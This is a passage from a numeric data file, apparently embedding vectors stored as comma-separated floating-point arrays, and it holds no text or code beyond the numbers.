8,0.012112841,-0.021225084,-0.010671917,0.013602221,-0.007867664,0.0041980175,-0.008489795,-0.0011864725,-0.009334094,0.014932417,-0.01934975,-0.024141142,-0.0047615487,-0.008625143,-0.007820108,-0.0042486233,0.00074343075,0.004092068,0.011223853,-0.006743509,-0.0085973,-0.014545274,-0.0010601041,-0.0037167547,-0.012603147,-0.008168893,-0.0048833387,-0.0052719857,0.036497682,0.009111391,0.022494731,0.0032983713,-0.0037822465,0.004713847,-0.028421612,-0.005907613,0.031942375,-0.021946916,-0.008248842,0.019211559,0.02001153,0.012337532,-0.00045086147,0.01767188,0.0084654745,0.012457809,0.0003873126,0.025037067,0.0035925573,0.01451424,0.017199539,-0.0039405064,-0.01537625,-0.0035267214,-0.021248417,-0.00073049724,0.0056159315,0.0180524,-0.007469403,-0.003890877,-0.01313774,0.0047300016,-0.027944202,0.005477576,0.046051204,0.0055780695,0.018336603,0.02318238,-0.007874717,-0.018520996,0.010198672,0.015695872,-0.018871754,0.008348003,-0.01913388,0.021456959,0.005565649,-0.0128564285,0.032613672,0.011450403,0.024214387,0.0036951334,0.005517312,-0.008338651,-0.011156586,0.029240435,0.012834055,0.017612217,0.014070422,-0.023432972,-0.020891912,0.010323583,0.004258122,-0.015431909,0.008930124,-0.00773867,0.014632203,-0.024928836,-0.0021368684,-0.022020703,0.03454837,-0.008506818,-0.0016645781,0.016488718,0.007392408,-0.014507664,-0.0074649933,-0.011274411,-0.011045911,-0.012449581,0.038113177,0.001370554,-0.015330828,-0.029628607,0.016081795,0.03643011,-0.012514434,0.025267951,0.000021164611,0.0043491884,-0.012120005,0.014704615,-0.0059645767,-0.002460187,-0.017472016,0.012684868,0.0073631294,-0.007448174,-0.008547381,0.018256502,0.010878285,0.007271233,-0.011854461,0.0057708826,0.0028797844,0.007274503,0.021261575,-0.01655442,0.014759338,-0.006611437,0.0022390604,-0.0012374223,-0.015887158,-0.0111748325,-0.019147703,0.027314488,-0.015076936,-0.011253376,0.0051981965,0.011641542,0.0063315267,-0.025463277,-0.019240467,0.0005239101,-0.0044220993,-0.008567972,-0.026446702,-0.0007861573,-0.013990451,-0.014403442,0.014926661,-0.00963095,0.017781591,-0.018640507,-0.023721142,0.0127503,0.02573944,-0.0065479204,-0.023991121,0.010080052,-0.0013109462,-0.0013474632,-0.007666588,0.0018577815,0.0033945441,-0.022161465,0.062115476,-0.016504414,0.0023357638,-0.0102441255,0.032106195,0.009778126,-0.023493333,0.008779095,-0.0095258355,-0.020821173,-0.012582882,-0.039073497,0.01295697,0.0065531316,-0.03648657,-0.023616476,0.021738663,-0.0062235123,0.008570358,-0.0008190622,0.012936495,-0.014632289,0.035027437,0.0026089603,-0.0057936264,-0.05745009,-0.023584476,0.016831193,-0.019333746,0.02104908,0.01304869,-0.0150474105,-0.01466102,0.0067695035,-0.02853444,-0.007884428,-0.00986139,-0.01497003,0.025638612,0.021046659,0.023117706,-0.006312588,-0.02308803,-0.0051055625,0.001516969,-0.010053313,-0.026028581,-0.0021796706,-0.0068225665,0.0133250905,-0.01974345,0.005699248,-0.00046097126,0.025045458,-0.025071425,0.021239206,0.0065528504,0.008350894,0.0019176736,0.002562659,0.021294912,-0.005963636,-0.02680563,-0.0151544595,0.0031638371,-0.0066092983,-0.011296879,-0.015791139,-0.018168442,-0.01198319,-0.009433282,0.0065162005,-0.0039631384,0.022212742,0.0064377086,-0.002447452,0.019843498,-0.004607326,0.0035687068,0.01556514,-0.02085917,0.012055983,-0.0067129037,-0.018926755,0.000002514467,0.017898297,0.005742437,0.011188902,-0.011335533,0.026094353,0.03931575,-0.0048157414,0.008673177,-0.012818874,-0.010067937,0.0126133505,-0.009403799,-0.02607799,0.0059691295,-0.016795505,-0.026241485,-0.0042821565,-0.012212542,0.0041403365,-0.014383705,-0.00018928798,-0.096385255,0.016371358,-0.012557409,-0.01822688,-0.009534725,-0.015784523,0.009491168,0.024009831,0.006010853,-0.05637919,-0.013932138,0.020562556,-0.0015513785,-0.015153612,-0.009918216,0.016045423,-0.024121983,-0.01620658,0.002001448,0.020210773,0.021799197,-0.023742843,-0.0041155377,-0.0045279674,0.0023899414,0.0019778546,0.011650093,0.011022498,0.0020287465,0.009416102,0.004831713,0.006211211,0.018053023,0.017925082,-0.004225935,0.0020378684,0.010130212,0.00013489874,-0.0011589692,-0.002038731,-0.0063690804,-0.0044187307,-0.005491893,0.005224974,0.013123561,0.0027266555,0.01585305,0.021866037,0.008888878,0.026175639,-0.01495921,-0.012929766,0.009306274,-0.010358896,-0.018894188,-0.016686816,0.0023466907,-0.008542857,0.004902541,0.0014501293,-0.012979878,-0.019899765,-0.0024819828,-0.0081401365,0.012186317,0.003145733,0.012167838,0.0065948,-0.036142733,-0.0028503935,-0.0016221254,0.009820302,-0.00032526543,0.004626838,-0.008953414,0.01708849,-0.0012970647,-0.003816137,-0.013977206,0.022744302,-0.034908492,-0.004036302,0.011125057,0.053961445,-0.006716544,-0.016020173,0.00024141769,0.011836272,-0.019334871,0.022225471,-0.0035669305,-0.009967625,-0.0055643376,-0.010653281,-0.004722247,0.012971891,-0.0028296509,0.013091813,-0.0073712156,0.008935238,-0.015331738,0.005501818,-0.0014355863,-0.034619056,-0.09532896,-0.0010539223,0.026514256,-0.016172327,-0.0054464326,-0.01132299,0.032007284,0.012368554,0.03070727,0.015546218,-0.010951016,0.03272746,-0.016710607,0.0020659233,-0.0061000925,0.0014814177,-0.024761321,-0.0049850345,-0.011287077,-0.0067326277,-0.0001287855,-0.018417098,-0.010179082,0.0010732561,0.0060745594,0.011552296,0.011977633,0.022686157,0.006931792,-0.01446744,-0.0045987964,-0.00007011405,-0.010348679,-0.0019461426,-0.013829331,-0.0064451345,-0.007849324,-0.023649054,-0.0027383128,0.013187275,0.009787251,0.017415456,0.017098472,0.019576363,-0.012620812,-0.000105083505,-0.010544773,0.017236864,0.0018802932,-0.011266792,0.008050072,-0.011888938,0.0049192356,-0.0065361666,-0.010586141,-0.025827076,0.0008446861,0.009779291,0.030831436,-0.0013871682,-0.0056193387,0.0130762635,-0.0054086214,0.006275646,-0.0057227463,0.011135197,-0.0018952778,0.012661478,-0.0008711204,0.0009150009,-0.00086431013,0.022168895,0.0059812097,-0.020991959,0.028217599,0.012789553,0.018824933,0.026103338,0.019521045,-0.0065496797,-0.0003822493,-0.04328151,-0.001883853,0.00694818,-0.034195147,0.035083372,0.000019211955,-0.01414543,-0.0072403755,0.005323722,0.02159527,0.005413986,-0.002968076,0.038974326,0.0074660634,0.0057992805,0.05448953,-0.0033459505,-0.0315671,-0.0070151878,0.00086185307,0.0034748043,-0.009023237,-0.004444698,-0.025948253,0.012347278,0.024975998,0.004121831,0.005916379,-0.0021816997,0.008409063,0.031447265,-0.014958091,0.009599395,0.019815523,0.00007604603,-0.017833961,-0.017529592,-0.008780903,-0.0017593276,0.015698038,-0.0015242803,-0.00626756,-0.014282827,0.009777481,-0.03477411,-0.028996853,0.014408329,0.016543122,-0.035062123,0.00147569,0.0060538827,0.0109510105,-0.013928575,-0.012009243,-0.0017840225,-0.014788702,0.010043578,-0.009987953,0.007993922,0.008811829,0.0007746095,-0.0024734694,-0.00799908,0.015133428,0.01448505,-0.019548092,-0.0062721553,-0.013363144,0.015785215,-0.008787248,-0.014337297,0.020071633,0.017150959,-0.0033294298,0.0041586836,-0.016268227,-0.00028422702,-0.0013070287,0.021617979,-0.00828672,0.030317442,0.016710024,-0.010647483,0.0011313141,-0.0117513025,-0.0053995014,0.005664095,0.0134011125,0.01000215,-0.007271623,-0.0121561065,0.007743934,-0.058695253,0.010724306,-0.005799269,0.015714888,0.01697776,0.04035274,0.013415492,-0.027023077,0.017243225,-0.011958334,-0.012674429,0.011185477,0.018221956,0.015387998,0.002791053,0.0005921652,-0.013716798,0.014254433,0.008041705,-0.012939366,-0.032531045,-0.00014414106,-0.0152296685,-0.00035857232,0.02925188,0.023546588,0.0070406217,-0.013811967,0.014731475,0.007539403,-0.022475915,0.008832082,0.0012902205,0.0013833002,0.016884446,0.024179487,-0.013250657,-0.01765205,0.010694934,-0.015998028,0.0003700209,0.010257653,0.021832447,-0.008409111,-0.019844096,-0.013370171,0.01822746,-0.016342504,-0.03531032,0.0018710346,-0.0035906218,-0.00192834,0.020502545,0.009339617,0.024691062,-0.030802716,-0.01321159,-0.014432358,-0.0077692163,-0.019433444,0.014059281,-0.0021091963,0.0115930615,0.02065397,0.011139366,0.015732754,0.009864516,0.023593057,0.009311247,0.020538745,0.021196889,0.025971577,-0.01342552,0.0066714874,-0.0038596354,0.019837676,0.028339626,-0.00059230294,-0.004897552,0.011803836,0.008171154,-0.0102616,0.016441572,0.0088757435,-0.002183819,-0.016994912,0.020299835,-0.019680414,-0.014516784,-0.021652138,-0.005681675,0.004439243,0.0022167058,-0.009027963,-0.025346246,-0.0012742747,0.013458459,0.029181227,0.0041882913,-0.007088116,0.026117366,0.008185628,-0.009456025,-0.009699386,-0.0071447394,0.0073551396,-0.0026305416,-0.00880324,-0.0008930253,-0.007700614,0.004240567,-0.016876291,0.0013488132,0.0015825857,0.0072978954,-0.038502563,-0.016034797,0.0037385726,-0.0041696634,0.010484925,-0.011340692,0.003925289,0.011501241,0.014197278,-0.0011058409,0.005139249,0.007928785,0.009007599,-0.025172113,-0.026961839,-0.012494152,0.010645283,-0.026610091,0.0009066403,0.014858203,-0.006565674,-0.012775251,-0.024813425,0.020382745,-0.012685967,0.010986549,0.00089080224,-0.012113699,-0.0011992948,0.006018163,-0.046635274,-0.014534505,0.003993484,-0.016990114,0.014797621,-0.004080936,-0.0017021671,0.019860642,0.0043020826,0.038562335,-0.013017151,-0.013417756,0.007053501,-0.020793134,-0.007757266,0.004417029,0.027064415,-0.01684318,0.017086431,0.033097018,-0.030171925,0.007854075,-0.005370268,0.005903201,-0.00839303,0.0000063428074,0.017409822,0.017927717,0.009660203,0.0045309463,0.0064455424,0.014096521,0.00133368,0.0062411977,-0.0046316525,-0.014620824,-0.0032965578,0.023086168,-0.03070241,0.0008516652,0.019783037,-0.0009151692,-0.0011890006,0.00568863,-0.013554943,-0.005015878,-0.0031899456,-0.014316714,-0.009919416,0.0032466403,-0.025662314,0.00089034,-0.017173955,0.018296713,-0.02444725,-0.023746422,-0.004565603,-0.0844718,0.010313366,0.011332504,0.02527074,0.05506142,0.00018157554,-0.008990403,-0.015068754,-0.0038704309,0.016912695,0.0033432746,-0.0014036826,-0.025860608,0.0023383687,0.035815664,-0.011789345,0.0028959876,0.01397096,0.0022734064,-0.0334289,0.008115286,-0.0021962025,-0.0064875656,-0.0138525,0.008816802,-0.02242409,-0.0060109496,-0.0037506884,-0.014318261,0.0008953933,-0.0043203756,0.0026842065,0.012970617,-0.002747399,-0.011908403,-0.0060639293,0.0066260607,0.012452647,-0.03570366,-0.036567673,-0.008815097,0.008007064,0.00043103626,0.0048691737,-0.030157672,0.019968743,-0.039393786,-0.018190704,-0.009971719,0.009753785,-0.0075906916,0.002963847,0.00986154,0.03573618,0.00080394314,0.0054864017,-0.007539352,-0.0068400404,0.031516917,0.0015779273,-0.017599093,0.008933118,0.013619517,-0.011860753,-0.0030489457,0.0043736617,0.0121764755,0.012982776,0.0016911763,0.008054616,-0.002288418,-0.03565905,-0.018766649,-0.019758597,0.0033270805,0.0038659645,0.0105161,-0.016728591,-0.012589691,0.0050538685,0.023553353,-0.008844979,0.020723104,-0.0027467601,0.01995319,0.0073078605,0.0031565428,0.011773819,0.025970146,0.0041827504,-0.024795368,-0.01659255,0.03230425,-0.005605153,0.018965604,-0.0054703215,0.0034706763,0.017363407,0.0027755767,0.0041524833,-0.0032928179,0.005395842,-0.006959277,-0.015880674,-0.01812649,0.003266466,-0.010903105,-0.008518117,0.0013619566,-0.01766516,-0.021548638,0.031108484,0.0067994474,0.043388665,0.013992776,0.015865132,-0.01415231,0.025211805,-0.01086181,-0.036186922,-0.004044339,0.00816225,-0.013436485,0.029981393,0.018286705,0.0014056397,0.009151418,-0.0030356306,-0.009072936,0.018587,-0.0051614232,0.013852342,0.021378277,0.018102614,-0.014398601,-0.005333953,-0.004320412,0.015026712,0.0048319115,0.026754292,0.007874516,-0.037340503,-0.002866725,-0.0070319884,-0.030420354,0.022660002,0.009342043,-0.003968671,0.0035961308,-0.008488089,-0.0021166254,-0.0061727827,-0.0031559006,0.011076082,-0.005243685,-0.0017799111,0.009027746,-0.002222097,-0.02750119,0.003965015,-0.009413984,0.0056073754,0.0077204746,-0.011732764,-0.019347986,0.0041256263,-0.0068322,-0.0068548843,0.0013270946,-0.0020510952,-0.024587533,-0.023273196,0.00611317,-0.0018881788,-0.019580731,-0.00038356162,0.026740048,0.011679677,-0.003877213,-0.007906709,-0.029198298,0.001923764,-0.008824572,-0.016858231,-0.002276421,-0.017541606,0.008320136,0.0048606484,0.027208133,-0.0017486146,0.0075587006,-0.008620338,0.0014636329,-0.022562709,-0.013395536,-0.023846595,0.0013451918,-0.0013311453,-0.015033005,0.005611227,0.011854663,0.0034308834,-0.019708615,0.029571455,0.046113178,0.021197831,-0.004510283,0.0111452,0.0050083883,0.01062779,-0.018104078,-0.0040784944,0.0031562652,0.1042012,0.0072644297,-0.014431177,-0.009248152,0.0054548327,0.00046184138,0.022733482,0.0022367411,-0.011277665,0.009444542,0.020772193,-0.026132237,0.011708889,-0.009620742,-0.010362189,0.028453993,0.006394898,-0.018222185,0.01895266,-0.0002242867,0.0030824295,-0.02153902,-0.017027963,-0.051070288,-0.010972227,-0.06349213,0.033838324,0.01781893,-0.0011706798,0.029171115,0.00014478668,-0.004049085,-0.00374259,0.018322606,-0.027241616,-0.0067577763,0.0050870627,-0.010478256,0.0016238015,-0.016013049,0.023311654,0.00419418,-0.0020928204,-0.007229871,-0.026522676,-0.0069633913,0.001305905,-0.0024221046,0.004262439,-0.009815331,-0.01826811,-0.0073452676,0.00068534445,-0.0018080394,0.0008633742,-0.01920666,-0.0064621246,0.0070237066,0.0047244136,0.006469577,0.00955701,0.007003562,0.011258493,0.0070785997,0.004896379,0.016777711,-0.0131876,0.016045958,-0.0011710228,-0.0035511213,0.003604305,-0.019375563,0.008120404,-0.0013607169,0.005490251,0.007964884,-0.007873604,-0.020354023,0.013590345,0.0072576017,0.008277127,-0.00786508,0.0000028013549,0.00036920144,0.0027515534,0.012387077,-0.0030972962,0.014534627,-0.011988213,-0.008590921,-0.0050687674,0.019265046,0.016131777,0.021443857,-0.0043321634,0.0060909917,0.0023737457,-0.015591001,-0.0054961615,0.01577078,-0.02217366,-0.016281122,0.0027908192,0.012167573,-0.00007023021,-0.00042585476,-0.013711142,0.0010212127,-0.011362855,-0.0113394,-0.013272019,0.020607827,0.0022684324,0.028766854,0.00026701068,0.047166165,-0.042448573,0.00016633836,0.0034310764,-0.023060508,-0.0018657143,0.030056775,0.008124542,0.028491275,0.0019312131,0.018068323,-0.014964584,-0.0077070254,-0.0009413985,-0.017563757,0.008855505,-0.03699871,0.021758812,0.03249261,-0.0042515094,0.0025836932,0.028491743,0.004456728,0.020415433,0.008860983,0.007928472,-0.01874752,-0.008350818,-0.011675166,0.0036660817,-0.024784347,0.024883004,0.0009976161,0.010168599,-0.022581425,0.0088265585,0.012573228,-0.013690862,0.014397534,0.0077372747,-0.020392831,0.004974687,0.015375425,-0.008332487,-0.012059215,0.0039506056,-0.00863325,-0.0047048405,-0.05535069,0.04040691,0.020605007,0.0040121498,0.0092942035,-0.0165278,-0.0088022025,-0.01381627,0.0074243783,-0.0012606735,-0.0006550612,0.0015322438,-0.0004673977,0.0002178513,0.0154492725,-0.012414008,0.0002395758,0.010058671,-0.0021205265,-0.008129264,-0.02106141,0.03338801,-0.013012312,0.015339223,-0.010750593,-0.025917452,0.03200131,-0.0116031915,-0.011995341,0.0043276814,0.0021415495,-0.01775103,0.014010781,-0.026280493,0.032795385,-0.0037656259,-0.035710175,0.0047121635,0.014684341,0.0122035,-0.026218014,-0.004883989,-0.015281769,-0.013094636,-0.01137524,-0.0067877853,-0.010655982,0.01957804,-0.007314373,-0.0064016506,-0.030629441,0.0059955437,-0.0028576637,-0.015321343,-0.02664549,0.0023057736,-0.018696822,-0.01615929,0.025695536,0.0062087006,-0.00019242486,0.005398977,0.015315584,-0.003232466,0.012377524,0.029347602,-0.025551401,-0.0242224,0.017364016,0.013776445,0.0008516967,-0.016434776,0.002024082,0.02738283,0.013715962,0.0029535438,0.02674499,-0.014925551,-0.005370612,0.021337632,-0.0038708,-0.011686218,0.018207386,-0.023122907,-0.024423013,-0.0039965827,-0.0019981125,-0.02203283,-0.001962338,0.000080072416,-0.032946754,-0.02510985,-0.0117605,-0.0063971304,0.012199261,0.004562707,-0.011765354,0.009487778,0.01620189,-0.006715231,0.016316203,-0.010580908,0.0017959537,0.008807748,-0.03454662,0.0017810483,0.017366359,0.004765785,0.0027055696,-0.0090553155,0.028663103,0.018666746,0.008418914,-0.005492444,-0.0003303321,-0.0066848793,-0.0058099893,-0.0040267115,-0.009399376,0.005501341,-0.027310073,-0.008438204,-0.005570344,-0.013279177,0.019032907,0.07945507,-0.06358176,-0.021745756,0.007732905,0.014669175,0.0011229083,0.021533268,0.0061824573,-0.034178153,-0.025501035,0.023364648,0.0006602327,-0.012860726,-0.0378673,-0.004792121,-0.000058836453,-0.006537288,0.0079154065,-0.0019222533,-0.011806967,-0.008775506,-0.0082622785,-0.009102095,0.00044942726,0.0005599774,-0.009216036,0.009333356,-0.016590716,0.023536485,0.0020553705,0.000047816593,0.021790052,0.017835343,-0.024294961,-0.0038617007,0.02184036,-0.008874509,0.020329852,-0.016713034,-0.031031713,-0.0189136,-0.000674119,-0.004762892,0.0058605224,-0.0052651344,-0.012439436,-0.027400943,0.010952602,-0.015267184,0.10857279,-0.0051435796,-0.001751087,0.023252854,0.006746682,-0.023388715,0.007876646,0.018133352,0.005634616,0.018702134,0.02594598,0.0023240754,0.0038518913,0.036610354,-0.009985579,0.0024114512,0.018467695,0.12017017,-0.020676298,0.03246879,-0.0034219082,-0.0025046759,0.0075703254,0.006346545,0.012572511,-0.08643476,0.0028008032,-0.039581828,-0.021113303,0.012527313,-0.028970482,0.011022345,-0.005071991,0.004236348,-0.0070916084,0.012545668,0.0021884928,0.012708585,-0.022759462,-0.017111924,0.020196829,-0.0049119093,-0.009803236,0.01388831,-0.019038793,0.020367207,-0.017655283,-0.01720952,0.0062195566,0.015208969,0.018822527,-0.005199522,0.018117962,-0.005247324,0.005952413,0.030994419,0.014937705,0.004103338,-0.038637355,-0.0020713753,0.0036068824,0.0137795815,-0.007600638,0.016314454,-0.0054413565,0.000843798,-0.0058540143,-0.005695493,0.0069294954,0.025769182,0.02042857,0.00943324,-0.0044823643,-0.018569615,0.04799182,0.0123556955,0.007903337,0.015090006,0.025399296,-0.0006752358,0.035089176,0.009845205,-0.008610391,0.0018508802,-0.0010467964,-0.008858301,0.009520907,0.00032755116,0.025309946,-0.020276528,-0.0068869223,0.007115755,-0.01634427,0.01121154,0.032213796,0.029770399,0.007836851,-0.00058446924,0.019075472,-0.025798863,-0.0017317575,0.025941478,-0.009436147,-0.010825901,-0.019203981,0.012876083,-0.0123810675,-0.034136377,0.0030557513,0.008639551,-0.0004287156,-0.006185183,-0.016373228,0.02374248,-0.020244664,-0.006375544,-0.016999932,-0.007423663,-0.03678215,-0.009737666,0.0032758976,-0.008449682,-0.0015858301,0.011547158,-0.01718593,0.0094631035,0.004794091,0.013389406,-0.0028519288,-0.004412717,-0.014923559,0.006615554,0.003120358,0.06111152,0.009166646,-0.014349921,0.019117866,-0.024530506,-0.0066052005,-0.0063606403,0.0059295236,0.0032800904,0.010017495,0.008012935,-0.0011203537,0.016986247,-0.0017098155,0.0019827033],[-0.017414723,0.008067969,-0.009587495,-0.010992916,-0.0033062212,-0.012538519,0.0025445875,0.001436147,0.0043652044,-0.01744421,0.00017956896,0.02670109,0.0034173017,0.0009083874,-0.02652077,-0.017448526,0.019704143,-0.0038436463,-0.0047275745,-0.004655248,0.0075223274,-0.005137524,0.017138453,-0.018665602,0.008257185,0.004629769,-0.0004078941,-0.0013371463,0.0006471492,-0.0028910837,-0.0031396004,0.023771094,0.032786913,-0.0054707625,0.012122906,0.0123958215,-0.016412232,-0.022300664,0.0028499947,-0.013809289,-0.008819646,0.016763791,-0.0040750615,0.009912456,-0.005344367,0.005623841,-0.012769837,0.015747637,-0.025594462,0.005618628,-0.0070808465,-0.006903584,-0.011407002,0.03582628,-0.0042158314,0.013836121,0.0012803775,-0.024452765,-0.0025793859,-0.0031427478,-0.012897442,0.0039986875,-0.008691008,-0.012179605,0.032548856,0.0067570624,0.007953454,-0.013888348,-0.01952557,-0.02526616,0.0009901677,-0.01716813,0.0021507167,-0.012160112,0.034915645,0.004498944,-0.00041402204,-0.011344678,-0.01946384,0.014875946,-0.004471539,-0.00009192082,-0.0030643311,0.0028525186,0.0117135085,-0.0064537525,-0.027254393,-0.0051476834,-0.016299922,-0.022268191,-0.01012036,0.0107037965,0.0053716684,-0.002197626,-0.005487678,0.014794072,0.018323611,-0.009612663,-0.0034428074,0.0169727,-0.011339977,-0.0021933175,-0.041113425,0.017861413,0.0057270913,-0.024492934,-0.010088859,-0.019175,-0.008322974,-0.0056372434,0.0056175967,0.0029740096,0.0038229064,0.0064075137,-0.000021010006,-0.0025418303,-0.0046163667,0.011891556,0.0029841545,0.020126538,-0.01927086,0.024982184,0.012666782,-0.0045178174,-0.0037053013,-0.0021313312,-0.00721746,0.013046474,0.005525996,-0.0038310823,-0.011436476,0.0065835537,0.00059538445,-0.01588675,0.008489667,-0.011201259,0.0060625123,-0.0051315785,0.0029449551,-0.013971819,0.014700658,-0.013014521,0.008061256,0.00023298635,0.022202251,0.020479055,-0.0034901274,0.026764281,0.017632445,-0.028749648,0.006340279,-0.00046515363,0.00073424826,-0.021150837,0.008157145,0.023135263,0.01969635,-0.015348344,-0.03140312,-0.026358947,-0.01853314,0.006778731,0.0019271363,-0.015203595,-0.01077585,-0.03845315,-0.0005568236,-0.00042647825,-0.01071194,0.010209516,0.0126875555,0.02732097,0.018210739,0.00041440103,0.0037370382,0.0123885255,0.01977633,-0.029192187,-0.01584632,0.005154965,0.009640324,0.008518988,0.001674461,0.0074154376,-0.00017797935,0.019733096,0.023217501,-0.015027438,-0.014919037,-0.0070387213,0.0038666667,-0.014331337,-0.0007173663,-0.0006738768,-0.020566812,-0.023793653,-0.010366365,0.10358908,-0.008124216,-0.0054191747,-0.03206296,0.0029441693,0.010826905,-0.022990324,-0.0058626314,-0.011580327,-0.0026752965,-0.008565188,0.015927311,-0.0012956999,0.0076908753,-0.0026575946,-0.01013702,0.006732258,0.015463346,-0.04832706,0.010309574,0.016994927,-0.005120371,0.0019744777,-0.025572993,0.0024908574,0.00955439,-0.030936334,-0.008142025,-0.019855013,0.007531928,0.012603684,0.014165102,-0.022616979,0.0086292215,0.016130539,-0.023768319,-0.030839626,0.011053216,-0.03046345,0.009166779,-0.0072698616,0.0041393256,-0.0022918477,-0.01642465,0.0088042235,0.035088845,0.03066684,-0.009266891,0.0060848393,0.01591886,0.01733149,-0.02595126,-0.0006396045,-0.0026055435,0.005954607,-0.0002426832,0.015806036,-0.0077733835,-0.016552286,-0.011412243,-0.0021511,0.0040275725,0.013646747,0.022914467,0.0197598,-0.012245148,0.03047479,0.031163787,0.016191166,0.009532648,-0.038501095,-0.016326202,0.0070648678,-0.019196212,-0.0017334184,-0.009417452,-0.0030412201,-0.002444919,-0.002985491,0.013929049,0.011079042,0.0045257485,-0.010991943,-0.0051958864,0.016151976,0.0015003086,-0.027101727,-0.007922926,0.009140846,-0.012499784,0.015462492,0.036919773,-0.01006886,0.006619546,0.0027659242,0.017240675,0.0065441877,-0.010234907,-0.01797745,-0.023835273,0.006240192,0.020494748,-0.025271932,-0.010900875,0.00056845346,0.024833973,0.006050275,-0.0032557298,-0.011119621,-0.003081792,0.04033357,-0.011596523,0.02986032,-0.03029838,0.0002755532,-0.026675118,0.00255999,-0.0017960558,0.0033002184,0.0068186386,-0.0058464645,-0.00734472,0.004912722,0.015008751,-0.02525631,-0.0067282747,-0.022553934,-0.018602472,0.0024119688,0.0068890895,-0.020470366,0.020941952,0.0052946205,-0.018188251,0.016770536,0.02846299,0.021381695,-0.031246921,0.014449756,-0.0040145996,0.023992762,0.013632305,0.017629996,-0.0025904186,-0.006287937,-0.0062656524,0.026710039,-0.0076488503,-0.00859248,-0.0070000216,0.004774177,0.012259728,0.010444845,0.019707631,-0.028975355,-0.010446522,-0.006223512,-0.026213393,0.003853795,-0.002297009,-0.016905477,0.0044174297,-0.02087701,0.011670206,0.012704294,-0.0124690505,0.004563213,0.085447244,0.009466663,0.011099607,0.01054701,-0.023128968,-0.0013032953,0.034884136,0.025046917,0.008924137,0.00821793,-0.01344829,-0.017037582,0.0046892767,0.0035234746,-0.014444025,0.022937438,-0.019923687,-0.018337753,-0.025719311,-0.004748472,0.031440407,-0.01911016,0.0057690404,0.024146277,0.014206597,0.024995063,0.008833772,-0.0077040475,0.008062814,-0.017823322,0.0037075558,-0.003318527,-0.014768626,0.00654242,-0.040857665,0.008104451,0.028087351,-0.00012999459,-0.009777579,-0.008359008,0.0036372459,0.006367506,0.0133520765,-0.03145752,-0.007459149,0.045227956,0.009872661,-0.010924964,-0.009048441,0.018013462,0.008803693,0.032600947,-0.016351433,0.016108116,-0.01279969,0.022466155,0.014272253,-0.03705298,0.037555955,0.018133257,0.0049787997,0.016209465,0.0054947976,-0.0030895297,-0.0022537124,0.030223185,-0.0039899694,-0.00037026303,-0.0018494368,-0.011667526,0.01936237,0.01231266,0.00013141643,0.024906427,-0.007123041,0.015270191,0.006911691,-0.007408253,0.013521665,0.02043089,-0.020018537,0.02660935,0.022416338,-0.007204169,-0.012345791,0.015025583,0.0049777403,0.009880297,0.024012014,-0.0031940306,-0.009056394,0.023132432,0.0065629156,0.009352635,0.02309782,0.022854593,0.01659058,0.018046355,0.0023880901,0.006918703,0.011451578,-0.0070573334,-0.009579272,-0.006909002,-0.01785572,0.010483333,0.02339045,0.00075535453,-0.000588918,0.033673033,-0.011379237,0.0073388293,0.016854512,-0.01468666,-0.00743784,-0.021920355,0.0032289329,-0.0105331335,-0.010294105,-0.0043974197,0.017489603,0.0065591317,0.0057567623,0.010943026,0.013906488,0.010785175,-0.005540196,-0.014809582,0.00681292,0.022323728,-0.0003196261,0.041336555,0.02009218,-0.032701403,0.0272307,0.0037894298,-0.015499024,-0.02821578,0.041819606,-0.004725735,0.019013109,0.02412249,0.032293778,-0.007875099,0.01347807,0.016624084,0.035562683,-0.0014581184,-0.027955143,0.00888662,-0.0029416524,-0.008162501,0.0019159493,0.002018995,-0.009862342,0.005033563,0.032826643,-0.026614709,-0.01848981,0.002072889,0.03854336,-0.022062613,0.0045029977,0.0072563672,-0.034005534,0.016755225,-0.0123404395,0.0639132,-0.013456384,-0.03292687,-0.005584324,0.0054702526,-0.001718826,-0.01613931,0.0040985276,-0.026571605,0.018545566,0.012406499,0.030585222,0.02197438,0.024647173,-0.0019231638,-0.007314825,0.0045703007,0.00050677377,-0.0040924083,0.017746918,-0.0050213244,0.0073957886,0.0033683532,-0.016753,-0.013393928,0.010513866,0.03420918,-0.0066102296,-0.0121632675,-0.0041511226,-0.022606153,0.0034311884,0.024681631,-0.005644953,0.009562619,-0.0028261114,0.018231958,-0.006387944,-0.004043587,0.029887257,-0.0070988913,0.0056140064,0.00129274,0.017191928,0.038154323,-0.0020829139,0.0073719295,-0.0025338316,0.0146043645,-0.00069078756,0.002228323,0.022718707,0.010573832,0.015671484,-0.022803975,0.0040519605,0.014944012,0.0087300455,-0.016966129,-0.0066580977,-0.012694653,-0.0058079963,-0.019344842,-0.015297226,-0.023268675,0.0030825255,0.010168706,-0.019210044,-0.005843077,-0.017681697,0.005307867,0.014217926,-0.011192764,-0.0040363455,0.021025388,0.005224426,-0.00089112396,0.021288304,0.010842602,-0.014785558,-0.0020356283,0.013408048,-0.0007238623,0.003564938,0.011257615,0.0048372536,0.0109863235,-0.006172182,0.0076746834,0.005301369,0.009383163,-0.019238545,0.013682786,0.0146207055,0.0052805846,0.010943,0.00003623678,-0.03613062,-0.0012886,0.00034327756,-0.024900103,0.004652725,-0.017574275,0.040772676,-0.016015783,-0.0010557881,0.007229522,-0.0034506377,0.006507973,-0.016086537,0.01909315,-0.052553985,-0.0024343706,0.0072591086,0.025946863,-0.02354485,0.043847367,0.03528597,0.0040743644,0.008786046,-0.0014124311,-0.009360839,0.0011440379,-0.0060673794,0.008800587,-0.010263145,-0.0164936,-0.043234456,-0.0065888977,-0.010539145,-0.05214357,-0.031400148,0.043964148,0.006920623,0.001123166,0.0035284036,0.023980424,-0.009930909,-0.0059866104,-0.016664691,-0.03711504,0.0003154269,0.023027888,-0.000040789415,0.012819231,0.021833222,-0.004954131,-0.006986199,-0.024028175,-0.006804808,0.011714156,0.019543275,-0.027068572,-0.014712667,0.010962932,-0.021970678,0.009907725,-0.034860756,0.023634825,0.00094538793,0.03766727,0.026550982,0.011348792,0.0023368115,0.008008668,-0.00085527456,0.0074700317,0.0047060843,0.025880108,0.017301751,0.014779126,0.01923823,-0.0005014177,-0.00056783925,-0.01896911,0.004291881,0.021397341,0.046525598,0.018765854,0.018802678,0.0052506407,0.014860047,0.016532747,0.009654907,-0.0057931147,0.025583792,0.017260265,-0.0064043254,0.027049564,-0.013997787,0.0070742206,-0.03034754,-0.034944873,-0.0191406,0.029251652,0.019155825,-0.00090803794,0.008957631,0.00022531682,0.0026834717,-0.0042288504,-0.002980899,-0.01243525,-0.004324973,-0.019110715,-0.014801315,-0.011841395,0.0027138316,-0.042340957,0.009824215,0.012761158,0.020319724,-0.012782749,-0.004768111,-0.010897521,-0.013559111,-0.024246056,-0.043192957,-0.013502192,0.006311